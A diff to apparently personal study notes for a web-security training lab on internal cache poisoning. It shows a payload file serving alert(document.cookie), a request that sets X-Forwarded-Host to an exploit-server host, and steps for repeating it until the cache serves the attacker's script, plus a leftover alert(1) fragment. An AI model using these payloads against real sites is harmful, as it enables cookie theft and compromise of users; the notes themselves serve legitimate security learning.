xasyhack/xasyhack.github.io/README.md

     alert(1)$$#
     ```
 - **Internal cache poisoning (Expert)**
+  - Exploit server
+    file: /js/geolocate.js
+    body: alert(document.cookie)
   - Keep sending the request
     ```
     GET /
     X-Forwarded-Host: exploit-0a860086033b6635828482c5014800bf.exploit-server.net
     ```
   - most of the times, you will see 3 times exploit url found in response but /geolocate.js?callback=loadCountry remain same
   - Keep sending the request.
-Eventually, the URL for the geolocate.js resource will also be overwritten with your exploit server URL
+Eventually, the URL for the geolocate.js resource will also be overwritten with your exploit server URL (4 times exploit url)
   - Remove `X-Forwarded-Host` and resend the request.
-Notice that only 2 times exploit url found in response
+Notice that only 2 times exploit url found in response.
+This indicates that the header is unkeyed by the internal cache but keyed by the external one.
-  - Exploit server
-    file: /js/geolocate.js
-    body: alert(document.cookie)
-  - Repeater > resend with X-Forwarded-Host untill all thress of the dynamic URLs in the resposne point to your exploit server

 ## HTTP Host Header
 - The HTTP Host header is a mandatory request header as of HTTP/1.1.
 It specifies the domain name that the client wants to access.